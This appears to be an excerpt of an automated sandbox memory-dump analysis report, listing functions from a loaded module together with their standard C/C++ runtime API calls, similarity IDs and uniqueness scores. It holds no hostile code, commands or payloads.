                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F06548F
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0654AF
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0654BC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057456
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057460
                                                                                                            • int.LIBCPMT ref: 6F057477
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0574B1
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0574D1
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0574DE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057C7C
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057C86
                                                                                                            • int.LIBCPMT ref: 6F057C9D
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057CD7
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057CF7
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057D04
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0574EB
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0574F5
                                                                                                            • int.LIBCPMT ref: 6F05750C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057546
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057566
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057573
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06539F
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0653A9
                                                                                                            • int.LIBCPMT ref: 6F0653C0
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0653FA
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F06541A
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065427
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0573C1
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0573CB
                                                                                                            • int.LIBCPMT ref: 6F0573E2
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F05741C
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F05743C
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057449
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057BE7
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057BF1
                                                                                                            • int.LIBCPMT ref: 6F057C08
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057C42
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057C62
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057C6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Mpunct$GetvalsH_prolog3
                                                                                                            • String ID: $+xv
                                                                                                            • API String ID: 2204710431-1686923651
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$InformationTimeZone
                                                                                                            • String ID:
                                                                                                            • API String ID: 597776487-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3033488037-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: MaklocchrMaklocstr$H_prolog3_
                                                                                                            • String ID:
                                                                                                            • API String ID: 2404127365-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Maklocstr$Maklocchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 2020259771-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 6F09CEFD
                                                                                                              • Part of subcall function 6F091434: HeapFree.KERNEL32(00000000,00000000,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?), ref: 6F09144A
                                                                                                              • Part of subcall function 6F091434: GetLastError.KERNEL32(?,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?,?), ref: 6F09145C
                                                                                                            • _free.LIBCMT ref: 6F09CF0F
                                                                                                            • _free.LIBCMT ref: 6F09CF21
                                                                                                            • _free.LIBCMT ref: 6F09CF33
                                                                                                            • _free.LIBCMT ref: 6F09CF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Smanip$task
                                                                                                            • String ID: .
                                                                                                            • API String ID: 1925983085-248832578
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F05DF6D
                                                                                                              • Part of subcall function 6F0567FA: _Maklocstr.LIBCPMT ref: 6F05681A
                                                                                                              • Part of subcall function 6F0567FA: _Maklocstr.LIBCPMT ref: 6F056837
                                                                                                              • Part of subcall function 6F0567FA: _Maklocstr.LIBCPMT ref: 6F056854
                                                                                                              • Part of subcall function 6F0567FA: _Maklocchr.LIBCPMT ref: 6F056866
                                                                                                              • Part of subcall function 6F0567FA: _Maklocchr.LIBCPMT ref: 6F056879
                                                                                                            • _Mpunct.LIBCPMT ref: 6F05DFFA
                                                                                                            • _Mpunct.LIBCPMT ref: 6F05E014
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                            • String ID: $+xv
                                                                                                            • API String ID: 2939335142-1686923651
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Mpunct$H_prolog3
                                                                                                            • String ID: $+xv
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: task
                                                                                                            • String ID:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                            • _free.LIBCMT ref: 6F08F2FB
                                                                                                            • _free.LIBCMT ref: 6F08F331
                                                                                                            • SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast_free
                                                                                                            • String ID:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,?,6F078835,6F08F53A,?,?,6F04565E,000008BB,6F0DA0D4), ref: 6F08F3F5
                                                                                                            • _free.LIBCMT ref: 6F08F452
                                                                                                            • _free.LIBCMT ref: 6F08F488
                                                                                                            • SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,?,?,6F078835,6F08F53A,?,?,6F04565E,000008BB,6F0DA0D4), ref: 6F08F493
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast_free
                                                                                                            • String ID:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F05039A
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503A6
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503B2
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503C1
                                                                                                            • task.LIBCPMTD ref: 6F04F87F
                                                                                                            • task.LIBCPMTD ref: 6F04F88B
                                                                                                            • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6F04F8A0
                                                                                                            • task.LIBCPMTD ref: 6F04F8B8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                            • String ID:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F05039A
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503A6
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503B2
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503C1
                                                                                                            • task.LIBCPMTD ref: 6F04F95F
                                                                                                            • task.LIBCPMTD ref: 6F04F96B
                                                                                                            • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6F04F980
                                                                                                            • task.LIBCPMTD ref: 6F04F998
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                            • String ID:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F051E36
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F051E43
                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6F051E80
                                                                                                              • Part of subcall function 6F050FAE: _Yarn.LIBCPMT ref: 6F050FCD
                                                                                                              • Part of subcall function 6F050FAE: _Yarn.LIBCPMT ref: 6F050FF1
                                                                                                            • std::exception::exception.LIBCMTD ref: 6F051EA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_std::exception::exception
                                                                                                            • String ID:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID: -
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%